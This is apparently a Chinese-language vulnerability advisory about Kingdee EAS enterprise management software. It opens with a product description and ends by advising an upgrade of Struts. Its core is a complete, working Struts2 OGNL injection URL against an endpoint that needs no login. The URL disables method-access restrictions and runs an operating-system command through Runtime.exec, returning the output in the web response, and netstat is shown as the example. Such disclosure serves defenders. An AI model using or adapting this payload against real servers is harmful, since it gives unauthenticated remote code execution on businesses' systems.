### 0x01 框架介绍
全球第一款融合TOGAF标准SOA架构的企业管理软件,金蝶EAS面向亟待跨越 成长鸿沟的大中型企业,以"创造无边界信息流"为产品设计理念, 支持云计算、SOA 和动态流程管理的整合技术平台,全面覆盖企业战略管理、风险管理、集团财务管 理、战略人力资源管理、跨组织供应链、多工厂制造和外部产业链等管理领域,突破 流程制造、项目制造、供应商协作、客户协作等复杂制造和产业链协同应用,实现业 务的全面管理,支持管理创新与发展,帮助企业敏捷应对日益复杂的商业环境变化, 提升整体运作效率,实现效益最大化。
官方主页:www.kingdee.com
![](https://images.seebug.org/contribute/94d0b22b-1425-4ff5-9918-eacadde1c12f-2016-01-12 20_26_28.jpg)
### 0x02 漏洞细节
http://localhost/plt_iservice/service/findFavList.action
等几个action为接口,无须登录便可以访问。
没有帐号也可以执行漏洞代码。
```
http://localhost/plt_iservice/service/findFavList.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43mycmd\75\'netstat%20-an\'')(d))&(h)(('\43myret\75@java.lang.Runtime@getRuntime().exec(\43mycmd)')(d))&(i)(('\43mydat\75new\40java.io.DataInputStream(\43myret.getInputStream())')(d))&(j)(('\43myres\75new\40byte[51020]')(d))&(k)(('\43mydat.readFully(\43myres)')(d))&(l)(('\43mystr\75new\40java.lang.String(\43myres)')(d))&(m)(('\43myout\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(n)(('\43myout.getWriter().println(\43mystr)')(d))
```
执行netstat -an
![](https://images.seebug.org/contribute/5c915d12-75c5-4068-ae34-e48e43696308-2016-01-12 20_28_53.jpg)
### 0x03 修复方案:
升级struts
暂无评论